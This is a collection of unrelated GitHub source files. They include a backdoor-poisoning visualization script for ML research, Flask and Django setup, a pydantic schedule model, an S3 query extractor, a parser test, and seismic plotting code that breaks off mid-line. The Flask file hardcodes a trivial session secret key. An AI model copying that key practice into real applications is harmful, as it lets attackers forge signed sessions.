+{"seq_id":"28907252482","text":"import random\nimport numpy as np\nimport torch\nimport os\nfrom torchvision import transforms\nimport argparse\nfrom torch import nn\nfrom utils import supervisor, tools, default_args\nimport config\nfrom sklearn.decomposition import PCA\nfrom sklearn.manifold import TSNE\nfrom matplotlib import pyplot as plt\nfrom sklearn import svm\nfrom sklearn.metrics import silhouette_score\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-method', type=str, required=False, default='pca',\n                    choices=['pca', 'tsne', 'oracle', 'mean_diff', 'SS'])\nparser.add_argument('-dataset', type=str, required=False, default=default_args.parser_default['dataset'],\n                    choices=default_args.parser_choices['dataset'])\nparser.add_argument('-poison_type', type=str, required=True,\n                    choices=default_args.parser_choices['poison_type'])\nparser.add_argument('-poison_rate', type=float, required=False,\n                    choices=default_args.parser_choices['poison_rate'],\n                    default=default_args.parser_default['poison_rate'])\nparser.add_argument('-cover_rate', type=float, required=False,\n                    choices=default_args.parser_choices['cover_rate'],\n                    default=default_args.parser_default['cover_rate'])\nparser.add_argument('-alpha', type=float, required=False, default=default_args.parser_default['alpha'])\nparser.add_argument('-test_alpha', type=float, required=False, default=None)\nparser.add_argument('-trigger', type=str, required=False,\n                    default=None)\nparser.add_argument('-no_aug', default=False, action='store_true')\nparser.add_argument('-model', type=str, required=False, default=None)\nparser.add_argument('-model_path', required=False, default=None)\nparser.add_argument('-no_normalize', default=False, action='store_true')\nparser.add_argument('-devices', type=str, default='0')\nparser.add_argument('-target_class', type=int, default=-1)\nparser.add_argument('-seed', type=int, required=False, default=default_args.seed)\n\nargs = parser.parse_args()\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"%s\" % args.devices\ntools.setup_seed(args.seed)\n\nif args.target_class 
== -1:\n target_class = config.target_class[args.dataset]\nelse:\n target_class = args.target_class\n\nif args.trigger is None:\n args.trigger = config.trigger_default[args.dataset][args.poison_type]\n\nbatch_size = 128\nkwargs = {'num_workers': 4, 'pin_memory': True}\n\n\nclass mean_diff_visualizer:\n\n def fit_transform(self, clean, poison):\n clean_mean = clean.mean(dim=0)\n poison_mean = poison.mean(dim=0)\n mean_diff = poison_mean - clean_mean\n print(\"Mean L2 distance between poison and clean:\", torch.norm(mean_diff, p=2).item())\n\n proj_clean_mean = torch.matmul(clean, mean_diff)\n proj_poison_mean = torch.matmul(poison, mean_diff)\n\n return proj_clean_mean, proj_poison_mean\n\n\nclass oracle_visualizer:\n\n def __init__(self):\n self.clf = svm.LinearSVC()\n\n def fit_transform(self, clean, poison):\n\n clean = clean.numpy()\n num_clean = len(clean)\n\n poison = poison.numpy()\n num_poison = len(poison)\n\n # print(clean.shape, poison.shape)\n\n X = np.concatenate([clean, poison], axis=0)\n y = []\n\n for _ in range(num_clean):\n y.append(0)\n for _ in range(num_poison):\n y.append(1)\n\n self.clf.fit(X, y)\n print(\"SVM Accuracy:\", self.clf.score(X, y))\n\n norm = np.linalg.norm(self.clf.coef_)\n self.clf.coef_ = self.clf.coef_ / norm\n self.clf.intercept_ = self.clf.intercept_ / norm\n\n projection = self.clf.decision_function(X)\n\n return projection[:num_clean], projection[num_clean:]\n\n\nclass spectral_visualizer:\n\n def fit_transform(self, clean, poison):\n all_features = torch.cat((clean, poison), dim=0)\n all_features -= all_features.mean(dim=0)\n _, _, V = torch.svd(all_features, compute_uv=True, some=False)\n vec = V[:, 0] # the top right singular vector is the first column of V\n vals = []\n for j in range(all_features.shape[0]):\n vals.append(torch.dot(all_features[j], vec).pow(2))\n vals = torch.tensor(vals)\n\n print(vals.shape)\n\n return vals[:clean.shape[0]], vals[clean.shape[0]:]\n\n\n\nif args.dataset == 'cifar10':\n num_classes = 10\nelif args.dataset == 'gtsrb':\n num_classes = 43\nelif args.dataset == 'imagenette':\n num_classes = 10\nelse:\n raise NotImplementedError(' %s' % args.dataset)\n\ndata_transform_aug, data_transform, trigger_transform, normalizer, denormalizer = supervisor.get_transforms(args)\n\n\narch = supervisor.get_arch(args)\n# Set up Poisoned Set\npoison_set_dir = supervisor.get_poison_set_dir(args)\nif os.path.exists(os.path.join(poison_set_dir, 'data')): # if old version\n poisoned_set_img_dir = os.path.join(poison_set_dir, 'data')\nif os.path.exists(os.path.join(poison_set_dir, 'imgs')): # if new version\n poisoned_set_img_dir = os.path.join(poison_set_dir, 'imgs')\npoisoned_set_label_path = os.path.join(poison_set_dir, 'labels')\npoison_indices_path = os.path.join(poison_set_dir, 'poison_indices')\n\npoisoned_set = tools.IMG_Dataset(data_dir=poisoned_set_img_dir,\n label_path=poisoned_set_label_path, transforms=data_transform)\n\npoisoned_set_loader = torch.utils.data.DataLoader(\n poisoned_set,\n batch_size=batch_size, shuffle=False, **kwargs)\n\npoison_indices = torch.tensor(torch.load(poison_indices_path))\n\n\ntest_set_dir = 'clean_set/%s/test_split/' % args.dataset\ntest_set_img_dir = os.path.join(test_set_dir, 'data')\ntest_set_label_path = os.path.join(test_set_dir, 'labels')\ntest_set = tools.IMG_Dataset(data_dir=test_set_img_dir, label_path=test_set_label_path,\n transforms=data_transform)\ntest_set_loader = torch.utils.data.DataLoader(\n test_set,\n batch_size=batch_size, shuffle=False, **kwargs\n)\n\n\n\n\n\nmodel_list = 
[]\nalias_list = []\n\n\n\"\"\"\nif args.poison_type == 'none': # no poison => load vanilla data and model\n path = os.path.join('models', '%s_vanilla_no_aug.pt' % args.dataset)\n model_list.append(path)\n alias_list.append('vanilla_no_aug')\n\n path = os.path.join('models', '%s_vanilla_aug.pt' % args.dataset)\n model_list.append(path)\n alias_list.append('vanilla_aug')\"\"\"\n\nif (hasattr(args, 'model_path') and args.model_path is not None) or (hasattr(args, 'model') and args.model is not None):\n path = supervisor.get_model_dir(args)\n model_list.append(path)\n alias_list.append('assigned')\n\nelse:\n # args.no_aug = True\n # #path = os.path.join(poison_set_dir, 'full_base_no_aug.pt') #\n # path = supervisor.get_model_dir(args)\n # model_list.append(path)\n # alias_list.append(supervisor.get_model_name(args))\n\n args.no_aug = False\n #path = os.path.join(poison_set_dir, 'full_base_aug.pt') #supervisor.get_model_dir(args)\n path = supervisor.get_model_dir(args)\n model_list.append(path)\n alias_list.append(supervisor.get_model_name(args))\n\n\npoison_transform = supervisor.get_poison_transform(poison_type=args.poison_type, dataset_name=args.dataset,\n target_class=target_class,\n trigger_transform=data_transform,\n is_normalized_input=True,\n alpha=args.alpha if args.test_alpha is None else args.test_alpha,\n trigger_name=args.trigger, args=args)\n\n\nif args.poison_type == 'TaCT':\n source_classes = [config.source_class]\nelse:\n source_classes = None\n\n\nfor vid, path in enumerate(model_list):\n\n ckpt = torch.load(path)\n\n # base model for poison detection\n model = arch(num_classes=num_classes)\n model.load_state_dict(ckpt)\n model = nn.DataParallel(model)\n model = model.cuda()\n model.eval()\n\n\n # Begin Visualization\n print(\"Visualizing model '{}' on {}...\".format(path, args.dataset))\n\n print('[test]')\n tools.test(model, test_set_loader, poison_test=True, poison_transform=poison_transform, num_classes=num_classes, source_classes=source_classes)\n\n\n\n targets = []\n features = []\n clean_features = []\n poisoned_features = []\n\n\n with torch.no_grad():\n for batch_idx, (data, target) in enumerate(poisoned_set_loader):\n data, target = data.cuda(), target.cuda() # train set batch\n targets.append(target)\n _, feature = model.forward(data, return_hidden=True)\n features.append(feature.cpu().detach())\n\n targets = torch.cat(targets, dim=0)\n targets = targets.cpu()\n features = torch.cat(features, dim=0)\n ids = torch.tensor(list(range(len(poisoned_set))))\n\n if len(poison_indices) == 0:\n\n if args.method == 'pca':\n visualizer = PCA(n_components=2)\n elif args.method == 'tsne':\n visualizer = TSNE(n_components=2)\n else:\n raise NotImplementedError('Visualization Method %s is Not Implemented!' 
% args.method)\n\n non_poison_indices = list(set(list(range(len(poisoned_set)))) - set(poison_indices.tolist()))\n #print(non_poison_indices)\n clean_targets = targets[non_poison_indices]\n print(\"Total Clean:\", len(clean_targets))\n print(\"Total Poisoned:\", 0)\n\n clean_features = features[non_poison_indices]\n\n class_clean_features = clean_features[clean_targets == target_class]\n clean_ids = ids[non_poison_indices]\n class_clean_ids = clean_ids[clean_targets == target_class]\n\n reduced_features = visualizer.fit_transform(\n class_clean_features) # all features vector under the label i\n\n #plt.scatter(reduced_features[:, 0], reduced_features[:, 1], facecolors='none', marker='o',\n # color='blue', label='clean')\n\n plt.scatter(reduced_features[:, 0], reduced_features[:, 1], marker='o', color='blue', s=5, alpha=0.5)\n plt.axis('off')\n save_path = 'assets/%s_%s_%s_class=%d.png' % (args.method, supervisor.get_dir_core(args, include_poison_seed=True), alias_list[vid], target_class)\n plt.savefig(save_path)\n print(\"Saved figure at {}\".format(save_path))\n plt.clf()\n\n else:\n\n\n non_poison_indices = list(set(list(range(len(poisoned_set)))) - set(poison_indices.tolist()))\n\n clean_targets = targets[non_poison_indices]\n poisoned_targets = targets[poison_indices]\n\n print(\"Total Clean:\", len(clean_targets))\n print(\"Total Poisoned:\", len(poisoned_targets))\n\n clean_features = features[non_poison_indices]\n poisoned_features = features[poison_indices]\n\n clean_ids = ids[non_poison_indices]\n poisoned_ids = ids[poison_indices]\n\n class_clean_features = clean_features[clean_targets == target_class]\n class_poisoned_features = poisoned_features[poisoned_targets == target_class]\n class_clean_ids = clean_ids[clean_targets == target_class]\n class_poisoned_ids = poisoned_ids[poisoned_targets == target_class]\n\n num_clean = len(class_clean_features)\n num_poisoned = len(class_poisoned_features)\n\n feats = torch.cat([class_clean_features, class_poisoned_features], dim=0)\n ids = list(range(0,len(feats)))\n random.shuffle(ids)\n #class_clean_features = feats[ids[:num_clean]]\n #class_poisoned_features = feats[ids[-num_poisoned:]]\n # class_poisoned_features = poisoned_features\n\n\n class_clean_mean = class_clean_features.mean(dim=0)\n print(class_clean_mean.shape)\n clean_dis = torch.norm(class_clean_features - class_clean_mean, dim=1).mean()\n poison_dis = torch.norm(class_poisoned_features - class_clean_mean, dim=1).mean()\n print('clean_dis: %f, poison_dis: %f' % (clean_dis, poison_dis))\n\n tmp_labels = [0] * len(class_clean_features) + [1] * len(class_poisoned_features)\n silhouette = silhouette_score(feats, tmp_labels)\n print('Silhouette Score:', silhouette)\n # exit()\n\n if args.method == 'pca':\n visualizer = PCA(n_components=2)\n elif args.method == 'tsne':\n visualizer = TSNE(n_components=2)\n elif args.method == 'oracle':\n visualizer = oracle_visualizer()\n elif args.method == 'mean_diff':\n visualizer = mean_diff_visualizer()\n elif args.method == 'SS':\n visualizer = spectral_visualizer()\n else:\n raise NotImplementedError('Visualization Method %s is Not Implemented!' 
% args.method)\n\n\n if args.method == 'oracle':\n clean_projection, poison_projection = visualizer.fit_transform(class_clean_features,\n class_poisoned_features)\n # print(clean_projection)\n # print(poison_projection)\n\n # bins = np.linspace(-2, 2, 100)\n plt.figure(figsize=(7, 5))\n # plt.xlim([-3, 3])\n plt.ylim([0, 100])\n\n plt.hist(clean_projection, bins='doane', color='blue', alpha=0.5, label='Clean', edgecolor='black')\n plt.hist(poison_projection, bins='doane', color='red', alpha=0.5, label='Poison', edgecolor='black')\n \n # plt.xlabel(\"Distance\")\n # plt.ylabel(\"Number\")\n # plt.axis('off')\n # plt.legend()\n elif args.method == 'mean_diff':\n clean_projection, poison_projection = visualizer.fit_transform(class_clean_features, class_poisoned_features)\n # all_projection = torch.cat((clean_projection, poison_projection), dim=0)\n\n # bins = np.linspace(-5, 5, 50)\n plt.figure(figsize=(7, 5))\n\n # plt.hist(all_projection.cpu().detach().numpy(), bins='doane', alpha=1, label='all', linestyle='dashed', color='black', histtype=\"step\", edgecolor='black')\n plt.hist(clean_projection.cpu().detach().numpy(), color='blue', bins='doane', alpha=0.5, label='Clean', edgecolor='black')\n plt.hist(poison_projection.cpu().detach().numpy(), color='red', bins='doane', alpha=0.5, label='Poison', edgecolor='black')\n \n plt.xlabel(\"Distance\")\n plt.ylabel(\"Number\")\n plt.legend()\n elif args.method == 'SS':\n clean_projection, poison_projection = visualizer.fit_transform(class_clean_features, class_poisoned_features)\n # all_projection = torch.cat((clean_projection, poison_projection), dim=0)\n\n # bins = np.linspace(-5, 5, 50)\n plt.figure(figsize=(7, 5))\n plt.ylim([0, 300])\n\n # plt.hist(all_projection.cpu().detach().numpy(), bins='doane', alpha=1, label='all', linestyle='dashed', color='black', histtype=\"step\", edgecolor='black')\n plt.hist(clean_projection.cpu().detach().numpy(), color='blue', bins='doane', alpha=0.5, label='Clean', edgecolor='black')\n plt.hist(poison_projection.cpu().detach().numpy(), color='red', bins=20, alpha=0.5, label='Poison', edgecolor='black')\n \n plt.xlabel(\"Distance\")\n plt.ylabel(\"Number\")\n plt.legend()\n else:\n reduced_features = visualizer.fit_transform( torch.cat([class_clean_features, class_poisoned_features], dim=0) ) # all features vector under the label\n\n plt.scatter(reduced_features[:num_clean, 0], reduced_features[:num_clean, 1], marker='o', s=5,\n color='blue', alpha=1.0)\n plt.scatter(reduced_features[num_clean:, 0], reduced_features[num_clean:, 1], marker='^', s=8,\n color='red', alpha=0.7)\n\n\n plt.axis('off')\n\n\n save_path = 'assets/%s_%s_%s_class=%d.png' % (args.method, supervisor.get_dir_core(args, include_poison_seed=True), alias_list[vid], target_class)\n plt.tight_layout()\n plt.savefig(save_path)\n print(\"Saved figure at {}\".format(save_path))\n\n plt.clf()","repo_name":"vtu81/backdoor-toolbox","sub_path":"visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":16110,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"53"} +{"seq_id":"17090601550","text":"from flask import Flask\nfrom flask_limiter import Limiter\nfrom flask_limiter.util import get_remote_address\n\napp = Flask(__name__)\napp.secret_key = \"Boogie\"\nlimiter = Limiter(\n app,\n key_func=get_remote_address, # get users IP address.\n default_limits=[\"200 per day\", \"50 per hour\"], # default limit to 300K request per 
month\n)","repo_name":"MXMaddux/song-a-gram","sub_path":"flask_app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5586821976","text":"\"\"\"NIPPI URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^analytics/', include('analytics.urls', namespace = \"analytics\")),\n url(r'^management/', include('management.urls', namespace = \"management\")),\n url(r'^nips/', include('nips.urls', namespace = \"nips\")),\n url(r'^receiver/', include('receiver.urls', namespace = \"receiver\")),\n url(r'^analytrecordsics/', include('records.urls', namespace = \"records\")),\n url(r'^siren/', include('siren.urls', namespace = \"siren\")),\n]\n","repo_name":"RichardSmith159/NIPPI","sub_path":"NIPPI/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37151080224","text":"import uuid\nfrom typing import Optional, ClassVar\nimport datetime\nfrom .base import BaseOpsCenterModel\nfrom pydantic import validator, root_validator, Field\n\n\ndef format_suspend_minutes(value):\n if value == 0:\n return \"\"\n elif value == 1:\n return \"1 minute\"\n else:\n return f\"{value} minutes\"\n\n\n## Adjust sizes\nclass WarehouseSchedules(BaseOpsCenterModel):\n table_name: ClassVar[str] = \"WH_SCHEDULES\"\n col_widths: ClassVar[dict] = {\n \"start_at\": (\"Start\", 1),\n \"finish_at\": (\"Finish\", 1),\n \"size\": (\"Size\", 1),\n \"suspend_minutes\": (\"Suspend\", 1, format_suspend_minutes),\n \"resume\": (\"Resume\", 1),\n \"scale_min\": (\"Scale Min\", 1, lambda x: max(x, 1)),\n \"scale_max\": (\"Scale Max\", 1, lambda x: max(x, 1)),\n \"warehouse_mode\": (\"Mode\", 1),\n \"comment\": (\"Comment\", 1),\n }\n id_val: str = Field(default_factory=lambda: uuid.uuid4().hex)\n name: str\n start_at: datetime.time = datetime.time.min\n finish_at: datetime.time = datetime.time.max.replace(microsecond=0, second=0)\n size: str\n suspend_minutes: int\n resume: bool\n scale_min: int\n scale_max: int\n warehouse_mode: str\n comment: Optional[str] = None\n weekday: bool = True\n day: Optional[str] = None\n enabled: bool = False\n _dirty: bool = False\n\n class Config:\n underscore_attrs_are_private = True\n # allow_mutation = False\n\n def get_id_col(self) -> str:\n return \"id_val\"\n\n def get_id(self) -> str:\n return self.id_val\n\n @validator(\"name\", allow_reuse=True)\n def verify_name(cls, v):\n if not v:\n raise ValueError(\"Name is required\")\n assert isinstance(v, str)\n return v\n\n @validator(\"start_at\", \"finish_at\", allow_reuse=True)\n def verify_time(cls, v):\n if v is None:\n raise ValueError(\"Time is required\")\n assert isinstance(v, datetime.time)\n 
assert (\n            datetime.time.min <= v <= datetime.time.max.replace(microsecond=0, second=0)\n        )\n        return v\n\n    @validator(\"size\", allow_reuse=True)\n    def verify_size(cls, v):\n        if not v:\n            raise ValueError(\"Size is required\")\n        assert isinstance(v, str)\n        assert v in _WAREHOUSE_SIZE_OPTIONS\n        return v\n\n    @validator(\"suspend_minutes\", allow_reuse=True)\n    def verify_suspend_minutes(cls, v):\n        if v is None:\n            raise ValueError(\"Suspend minutes is required\")\n        assert isinstance(v, int)\n        assert v >= 0\n        return v\n\n    @validator(\"resume\", \"weekday\", \"enabled\", allow_reuse=True)\n    def verify_resume(cls, v):\n        if v is None:\n            raise ValueError(\"Resume is required\")\n        assert isinstance(v, bool)\n        return v\n\n    @validator(\"scale_min\", \"scale_max\", allow_reuse=True)\n    def verify_scale(cls, v):\n        if v is None:\n            raise ValueError(\"Scale is required\")\n        assert isinstance(v, int)\n        assert 10 >= v >= 0\n        return v\n\n    @validator(\"warehouse_mode\", allow_reuse=True)\n    def verify_warehouse_mode(cls, v):\n        if not v:\n            raise ValueError(\"Warehouse mode is required\")\n        assert isinstance(v, str)\n        assert v in _WAREHOUSE_MODE_OPTIONS\n        return v\n\n    @root_validator(allow_reuse=True)\n    @classmethod\n    def verify_start_finish(cls, values):\n        start_at = values.get(\"start_at\", datetime.time.min)\n        finish_at = values.get(\n            \"finish_at\", datetime.time.max.replace(microsecond=0, second=0)\n        )\n        if start_at and finish_at and start_at >= finish_at:\n            raise ValueError(\"Start time must be before finish time\")\n        return values\n\n    @root_validator(allow_reuse=True)\n    @classmethod\n    def verify_scales(cls, values):\n        scale_min = values.get(\"scale_min\", 0)\n        scale_max = values.get(\"scale_max\", 0)\n        if scale_min >= 0 and scale_max >= 0 and scale_min > scale_max:\n            raise ValueError(\"Scale min must be less than scale max\")\n        return values\n\n\n_WAREHOUSE_SIZE_OPTIONS = [\n    \"X-Small\",\n    \"Small\",\n    \"Medium\",\n    \"Large\",\n    \"X-Large\",\n    \"2X-Large\",\n    \"3X-Large\",\n    \"4X-Large\",\n    \"5X-Large\",\n    \"6X-Large\",\n    \"Medium Snowpark\",\n    \"Large Snowpark\",\n    \"X-Large Snowpark\",\n    \"2X-Large Snowpark\",\n    \"3X-Large Snowpark\",\n    \"4X-Large Snowpark\",\n]\n\n_WAREHOUSE_MODE_OPTIONS = [\n    \"Standard\",\n    \"Economy\",\n    \"Inherit\",\n]\n","repo_name":"sundeck-io/OpsCenter","sub_path":"app/crud/wh_sched.py","file_name":"wh_sched.py","file_ext":"py","file_size_in_byte":4461,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"28462261823","text":"from extract.modules.s3_utilities import (\n    s3_delete_objects,\n    s3_read_sql,\n)\nfrom extract.modules.csv_utilities import (\n    create_csv_writer,\n)\nfrom extract.modules.glue_utilities import (\n    format_sql_row,\n    test_chunk_size,\n)\nimport boto3\nfrom typing import Union\nfrom sqlalchemy import text\nfrom sqlalchemy.engine import Engine\n\nclass QueryExtract:\n    def __init__(\n        self,\n        name: str,\n        bucket: str,\n        key: str,\n        has_bookmark: bool,\n        bookmark: str,\n        chunks: int,\n        rows: int\n    ):\n        self.name = name\n        self.bucket = bucket\n        self.key = key\n        self.has_bookmark = has_bookmark\n        self.bookmark = bookmark\n        self.chunks = chunks\n        self.rows = rows\n\n    def delete(self):\n        s3_delete_objects(self.bucket, self.key)\n\nclass Query:\n    def __init__(\n        self,\n        name: str,\n        bucket: str,\n        key: str,\n        parameters: Union[dict, None],\n        bookmark: Union[str, None],\n        engine: Engine\n    ):\n        params = {} if parameters is None else parameters\n        try:\n            query = s3_read_sql(bucket, key)\n            try:\n                query = 
query.format(**params)\n except Exception as e:\n raise Exception(\"Not all query parameters were defined.\")\n query = text(query)\n if 'BOOKMARK' in query.compile(engine).params:\n has_bookmark = True\n query = query.bindparams(BOOKMARK = bookmark)\n warning = None\n else:\n has_bookmark = False\n if bookmark is not None:\n warning = ''.join([\n f\"Bookmark was set to `{bookmark}`, however query does not \",\n \"contain the `:BOOKMARK` specification. Bookmark set \",\n \"to `None`.\"\n ])\n bookmark = None\n else:\n warning = None\n except Exception as error:\n raise error\n else:\n self.name = name\n self.query = query\n self.parameters = parameters\n self.has_bookmark = has_bookmark\n self.bookmark = bookmark\n self.engine = engine\n self._warning = warning\n\n def show_query(self):\n print(str(self.query.compile(compile_kwargs={\"literal_binds\": True})))\n\n def extract(\n self,\n bucket: str,\n key: str,\n metadata: Union[dict, None] = None,\n chunk_size: int = 100000,\n chunk_memory: int = 90,\n stream_size: int = 5000,\n verbose = True,\n printer = print\n ) -> QueryExtract:\n try:\n s3 = boto3.client('s3')\n metadata = {} if metadata is None else metadata\n chunk_key = f'{key}/chunk_{{n}}.csv'\n chunk_test_at = chunk_size * 0.01\n result_empty = True\n chunk_n = 1\n bookmark = self.bookmark\n n = 0\n with self.engine.connect().execution_options(yield_per = stream_size) as con:\n result = con.execute(self.query)\n fields = list(result.keys())\n if self.has_bookmark:\n bm_i = fields.index('____')\n else:\n bm_i = len(fields)\n buffer, writer = create_csv_writer()\n writer.writerow(fields)\n fields_str_len = len(buffer.getvalue())\n if verbose:\n printer(f'Extracting chunk {chunk_n}')\n for i, row in enumerate(result):\n n = i + 1\n if n == 1:\n result_empty = False\n if self.has_bookmark:\n bookmark = str(format_sql_row(row, len(fields))[bm_i])\n if n % chunk_size:\n writer.writerow(format_sql_row(row, bm_i))\n if n == chunk_test_at:\n chunk_size = test_chunk_size(\n buffer = buffer,\n n_rows = chunk_test_at,\n max_rows = chunk_size,\n max_size = chunk_memory\n )\n if n == chunk_size:\n if verbose:\n printer(f'Writing chunk {chunk_n}')\n write_response = s3.put_object(\n Bucket = bucket,\n Key = chunk_key.format(n = str(chunk_n).zfill(7)),\n Body = buffer.getvalue(),\n Metadata = metadata\n )\n chunk_n += 1\n buffer, writer = create_csv_writer()\n else:\n writer.writerow(format_sql_row(row, bm_i))\n if verbose:\n printer(f'Writing chunk {chunk_n}')\n write_response = s3.put_object(\n Bucket = bucket,\n Key = chunk_key.format(n = str(chunk_n).zfill(7)),\n Body = buffer.getvalue(),\n Metadata = metadata\n )\n chunk_n += 1\n buffer, writer = create_csv_writer()\n writer.writerow(fields)\n if verbose:\n printer(f'Extracting chunk {chunk_n}')\n if len(buffer.getvalue()) > fields_str_len:\n if verbose:\n printer(f'Writing chunk {chunk_n}')\n write_response = s3.put_object(\n Bucket = bucket,\n Key = chunk_key.format(n = str(chunk_n).zfill(7)),\n Body = buffer.getvalue(),\n Metadata = metadata\n )\n else:\n if verbose:\n printer('Nothing to extract')\n chunk_n -= 1\n return(QueryExtract(\n name = self.name,\n bucket = bucket,\n key = key,\n has_bookmark = self.has_bookmark,\n bookmark = bookmark,\n chunks = 0 if result_empty else chunk_n,\n rows = n\n ))\n except Exception as error:\n error = ''.join([\n f\"Failed to extract table: {error} \",\n f'Removing all chunks from s3//{bucket}/{key}.'\n ])\n try:\n s3_delete_objects(bucket, key)\n error = f'{error} Successfully removed all 
chunks.'\n except Exception as del_error:\n error = f'{error} Failed to remove all chunks. {del_error}'\n raise Exception(error)","repo_name":"jjd-bailey/python_dev_tools","sub_path":"extract/modules/extract_query.py","file_name":"extract_query.py","file_ext":"py","file_size_in_byte":7219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23082619586","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2017/9/27 下午6:03\n# @Author : Hou Rong\n# @Site : \n# @File : TestBooking.py\n# @Software: PyCharm\nimport unittest\nimport json\nfrom proj.my_lib.new_hotel_parser.booking_parser import booking_parser\nfrom mioji.common.ufile_handler import download_file\n\n\ndef test_booking_parser(page):\n return booking_parser(page,\n url='',\n other_info={'source_id': 'test', 'city_id': 'test'}\n )\n\n\nclass TestBooking(unittest.TestCase):\n def test_name(self):\n name_cases = ['b36a1e904c0cf44784e36f29f3eba11e']\n name_result = [('', 'Penzi\\xc3\\xb3n Rogalo')]\n for case, res in zip(name_cases, name_result):\n page = download_file(case)\n j_data = json.loads(page)\n result = test_booking_parser(j_data['data'])\n self.assertTupleEqual((result.hotel_name, result.hotel_name_en), res)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"20113261/platform_service","sub_path":"test/hotel_detail/TestBooking.py","file_name":"TestBooking.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"10056087503","text":"from typing import Tuple, List, Union\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom pathlib import Path\nfrom imageio import mimsave\nfrom cv2 import resize\n\n\ndef clim(in_content: np.ndarray, ratio: float = 95) -> Tuple[float, float]:\n c = np.percentile(np.absolute(in_content), ratio)\n return -c, c\n\n\ndef explode_volume(volume: np.ndarray, t: int = None, x: int = None, y: int = None,\n figsize: tuple = (8, 8), cmap: str = 'bone', clipval: tuple = None, p: int = 98,\n tlim: tuple = None, xlim: tuple = None, ylim: tuple = None, labels : list = ('[s]', '[km]', '[km]'),\n ratio: tuple = None, linespec: dict = None,\n filename: str or Path = None, save_opts: dict = None) -> plt.figure:\n if linespec is None:\n linespec = dict(ls='-', lw=1, color='orange')\n nt, nx, ny = volume.shape\n t_label, x_label, y_label = labels\n \n t = t if t is not None else nt//2\n x = x if x is not None else nx//2\n y = y if y is not None else ny//2\n\n if tlim is None:\n t_label = \"samples\"\n tlim = (0, volume.shape[0])\n if xlim is None:\n x_label = \"samples\"\n xlim = (0, volume.shape[1])\n if ylim is None:\n y_label = \"samples\"\n ylim = (0, volume.shape[2])\n \n # vertical lines for coordinates reference\n tline = (tlim[1] - tlim[0]) / nt * t + tlim[0]\n xline = (xlim[1] - xlim[0]) / nx * x + xlim[0]\n yline = (ylim[1] - ylim[0]) / ny * y + ylim[0]\n \n # instantiate plots\n fig = plt.figure(figsize=figsize)\n if ratio is None:\n wr = (nx, ny)\n hr = (ny, nx)\n else:\n wr = ratio[0]\n hr = ratio[1]\n opts = dict(cmap=cmap, clim=clipval if clipval is not None else clim(volume, p), aspect='auto')\n gs = fig.add_gridspec(2, 2, width_ratios=wr, height_ratios=hr,\n left=0.1, right=0.9, bottom=0.1, top=0.9,\n wspace=0.0, hspace=0.0)\n ax = fig.add_subplot(gs[1, 0])\n ax_top = fig.add_subplot(gs[0, 0], sharex=ax)\n ax_right = fig.add_subplot(gs[1, 1], sharey=ax)\n \n # central plot\n ax.imshow(volume[:, :, y], 
extent=[xlim[0], xlim[1], tlim[1], tlim[0]], **opts)\n ax.axvline(x=xline, **linespec)\n ax.axhline(y=tline, **linespec)\n \n # top plot\n ax_top.imshow(volume[t].T, extent=[xlim[0], xlim[1], ylim[1], ylim[0]], **opts)\n ax_top.axvline(x=xline, **linespec)\n ax_top.axhline(y=yline, **linespec)\n ax_top.invert_yaxis()\n \n # right plot\n ax_right.imshow(volume[:, x], extent=[ylim[0], ylim[1], tlim[1], tlim[0]], **opts)\n ax_right.axvline(x=yline, **linespec)\n ax_right.axhline(y=tline, **linespec)\n \n # labels\n ax_top.tick_params(axis=\"x\", labelbottom=False)\n ax_right.tick_params(axis=\"y\", labelleft=False)\n ax.set_xlabel(\"x \" + x_label)\n ax.set_ylabel(\"t \" + t_label)\n ax_right.set_xlabel(\"y \" + y_label)\n ax_top.set_ylabel(\"y \" + y_label)\n \n if filename is not None:\n if save_opts is None:\n save_opts = {'format': 'png', 'dpi': 150, 'bbox_inches': 'tight'}\n plt.savefig(f\"{filename}.{save_opts['format']}\", **save_opts)\n plt.show()\n\n\ndef gif_from_array(in_content: np.ndarray, filename: str or Path,\n clipval: tuple = None, p: int = 98, axis: int = 0,\n width: int = None, height: int = None, **kwargs) -> None:\n if clipval is None:\n clipval = clim(in_content, p)\n if axis > in_content.ndim:\n raise ValueError(\"Provided dir has to be a in_content dimension\")\n \n in_content = np.clip(in_content, clipval[0], clipval[1])\n in_content = (in_content - clipval[0]) / (clipval[1] - clipval[0])\n in_content = (in_content * 255).astype(np.uint8)\n \n if axis != 0:\n in_content = np.swapaxes(in_content, axis, 0)\n \n frames = [in_content[_].T for _ in range(in_content.shape[0])]\n \n if width is not None and height is not None:\n dim = (width, height)\n frames = [resize(f, dim) for f in frames]\n \n mimsave(filename, frames, 'GIF', **kwargs)\n\n\ndef seismograms(in_content: np.ndarray, ax, tlim: tuple = None, xlim: tuple = None,\n gain: float = 1., color: Union[str, Tuple[str]] = 'black') -> None:\n if isinstance(color, str):\n color = (color, color)\n elif 